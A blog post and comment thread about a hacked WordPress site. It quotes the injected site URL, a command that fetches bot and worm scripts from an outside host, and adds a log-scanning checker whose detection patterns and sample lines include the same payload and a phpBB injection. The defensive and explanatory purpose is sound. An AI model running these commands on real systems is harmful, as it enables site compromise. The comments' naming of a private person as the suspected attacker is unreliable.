Huh? Did someone hack my site? I loaded the page and got no CSS, so checked the template to find that the link to the CSS file had been replaced by this (I added line breaks, this was really all one long line):

http://huminf.uib.no/~jill/wp-login.php?
action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;
wget%20www.visualcoders.net/spybot.txt;
wget%20www.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;
wget%20www.visualcoders.net/ownz.txt;
wget%20www.visualcoders.net/wp-layout.css

My template was fine, so I looked at the options, and sure enough, my “site URL”, which WordPress glues into the template for almost every link it makes and which is supposed to be simply this: “http://huminf.uib.no/~jill/”, had been changed to all the following:

http://huminf.uib.no/~jill/wp-login.php?
action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;
wget%20www.visualcoders.net/spybot.txt;
wget%20www.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;
wget%20www.visualcoders.net/ownz.txt;
wget%20www.visualcoders.net

That looks very uncool. Now even to a total amateur at PHP like me, that seems to read as though every time someone looks at my blog, instead of the site fetching a CSS file that makes the page look pretty, an action is invoked that “gets” (“wget”, yeah?) a whole pile of nasty files called things like spy.gif and worm1.txt.

Does anyone understand this? What are they actually trying to do? Would this affect readers or my site? Would I have seen all sorts of stupid messages about how “spykids ownz your browser” if I’d been using Windows and Microsoft Explorer instead of Firefox on a Mac? And how the heck did they change my site URL?

I fixed it, but I should obviously do something about security, huh? Except it’s Christmas! I don’t have time for this!!!
[I’ve asked for help at the WordPress support forum as well, and I filed a complaint against visualcoders.net with Google, who run AdWords through them. And I emailed the person who registered the domain, Mimoun Raddahi, who lives in Antwerpen, Belgium. Is there any chance visualcoders.net isn’t to blame here?]
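An added example, not code from the original post or from WordPress: a small Python checker that percent-decodes request URIs (including the double-encoded `%252e` form seen later in this thread), flags log lines carrying the `cmd=cd /tmp;wget ...` and `system(chr(...))` patterns, and tests whether a WordPress site URL option still equals the expected base URL. The log lines and the `example.invalid` host are constructed for the example.

```python
"""Flag access-log lines carrying the injected-command pattern from this
thread and check a WordPress siteurl option for tampering (added example;
all sample data below is constructed)."""
import re
from urllib.parse import unquote

# Constructed Apache-style log lines: one benign CSS fetch, the wp-login
# injection, a double-encoded phpBB highlight= injection, and a normal post.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Dec/2004:10:01:02 +0100] "GET /~jill/wp-layout.css HTTP/1.1" 200 512
203.0.113.7 - - [25/Dec/2004:10:01:03 +0100] "GET /~jill/wp-login.php?action=http://example.invalid/spy.gif?&cmd=cd%20/tmp;wget%20example.invalid/spybot.txt HTTP/1.0" 200 0
203.0.113.9 - - [25/Dec/2004:10:01:04 +0100] "GET /forum/viewtopic.php?t=97&highlight=%2527%252esystem(chr(99)%252echr(100))%252e%2527 HTTP/1.0" 200 0
203.0.113.11 - - [25/Dec/2004:10:01:05 +0100] "GET /~jill/?p=12 HTTP/1.1" 200 4096
"""

INDICATORS = [
    re.compile(r"cmd=.*(cd\s+/tmp|wget\s|curl\s)", re.I),  # shell command in a parameter
    re.compile(r"system\s*\(|chr\s*\(\d+\)", re.I),          # PHP system()/chr() obfuscation
    re.compile(r"[?&][^=]+=https?://", re.I),                 # parameter pointing at a remote URL
]

def fully_decode(s: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so %252e (double-encoded '.') becomes '.'."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def suspicious_reasons(request_uri: str) -> list:
    """Return the indicator patterns that match the decoded request URI."""
    decoded = fully_decode(request_uri)
    return [p.pattern for p in INDICATORS if p.search(decoded)]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

def scan_log(text: str) -> list:
    """Return (client_ip, request_uri, reasons) for every flagged line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = suspicious_reasons(m.group(2))
        if reasons:
            hits.append((m.group(1), m.group(2), reasons))
    return hits

def siteurl_tampered(value: str, expected: str) -> bool:
    """True unless the stored siteurl is exactly the expected base URL."""
    return fully_decode(value).rstrip("/") != expected.rstrip("/")
```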

10 thoughts on “did my blog just get hacked?”

  1. L33tdawg

    The attack you speak of is actually quite well known — if you look at the contents of the text files you’ll see that they’re basically PERL scripts designed to compromise anyone who unsuspectingly clicks on the link and is vulnerable (IE users only). That being said, if you examine the ownz.txt file you’ll see that this ‘kit’ has been assembled by the rather well known group ‘Spykids’ (http://www.zone-h.org/en/defacements/filter/filter_defacer=spykids). It looks like you either have a member of Spykids trying to ‘own’ your site or a script kiddie who happens to have the spykid ‘kit’ so to speak. You might want to see if there are any vulns for your version of WordPress.

    Good luck.

    Cheers,
    LD.

  2. Elin

    Something odd is happening at my site too – my index file is being replaced now and then. It has been happening for some months – but I don’t have time to look at it. Argh.

  3. AWolf

    wget is a network utility to retrieve files from the Web using http and ftp and it runs from the command line in *nix operating systems. It is very useful for mirroring sites and if you aren’t careful, it might try to download the entire internet onto your server (a mistake I made several years ago when I was moving my websites to a new service provider). Also the “%20” is a blank space in html. My original guess was that visualcoders.net was the intended victim of your site being hacked. That is just a guess.

  4. Tom Bartling

    One of my websites also got hit, although I haven’t found any negative effects. They tried to access a page that’s looking for an ID number, but they replaced the ID with the same info that you posted.

    I did a little research.
    The hit came from IP address 213.193.231.130.
    213.193.231.130 is owned by Tom Myny at Linux Systems.
    The script pointed to visualcoders.net.
    Tracking the IP for visualcoders.net using traceroute (or tracert on Windows) finds visualcoders.net is located at 213.193.231.130.
    visualcoders.net is owned by Mimoun Raddahi.
    The original email address for Mimoun Raddahi is mimoun@pandora.be
    pandora.be is a domain that is owned by Telenet.

    I suspect that Mimoun Raddahi is the hacker. I sent an email to Tom Myny at Linux Systems (the hosting company for visualcoders.net), and I copied the Technical Contact at Telenet.

    Hopefully, this will resolve the hacking problem.

    On a side note, this happened to me on Dec. 26th. While doing research, I Googled “Mimoum Raddahi” and found this website, one day after your posting. Man, google is fast.

  5. Tom Myny

    Hi All,

    A script was running on our servers (wget%20www.visualcoders.net/spybot.txt; wget%20www.visualcoders.net/worm1.txt;) because one of our customers’ phpBB sites was hacked (viewforum.php bug).
    I removed the buggy PHP file and stopped the processes.
    visualcoders.net is not hosted by us (never was …)

    Best Regards,
    Tom

  6. Messenger

    HOLA

  7. Lars

    Indeed the 1st Google return for Mimoun Raddahi is this thread..!!!

    Our stats file showed a 5x leap in page views on xmas day and from looking at the log files I found pretty much the same string described above.. hitting us every couple of seconds and coming from multiple IP addys.

    Then I noticed a repetitive request string using LWP:
    http://www.google.com/search?hl=en&q=LWP&btnG=Google+Search
    which looks like a data scrape script. I reported the flood to Go Daddy but wouldn’t ya know it; visualcoders.net is now hosted (already) somewhere else.

    At least we haven’t had any problems with re-write of our files but this kind of action def. borders on the criminal, imho 8-(

  8. Jill

    Wow, thanks guys, for the speedy work! Google works really fast, yes…

    There’s a lot more about this kind of attack on WordPress blogs in the WordPress support forums – it’s done simply by typing commands into the URL. The vulnerability is fixed in the latest version of WordPress, or you can delete a few lines from one of the files in earlier versions to protect your system. Discussions are here and here.

    Scary, huh?

  9. k

    welcome to the internet.

  10. Bryan-Mitchell Young

    Apparently, it is a new worm going around that attacks PHP sites, including wordpress.
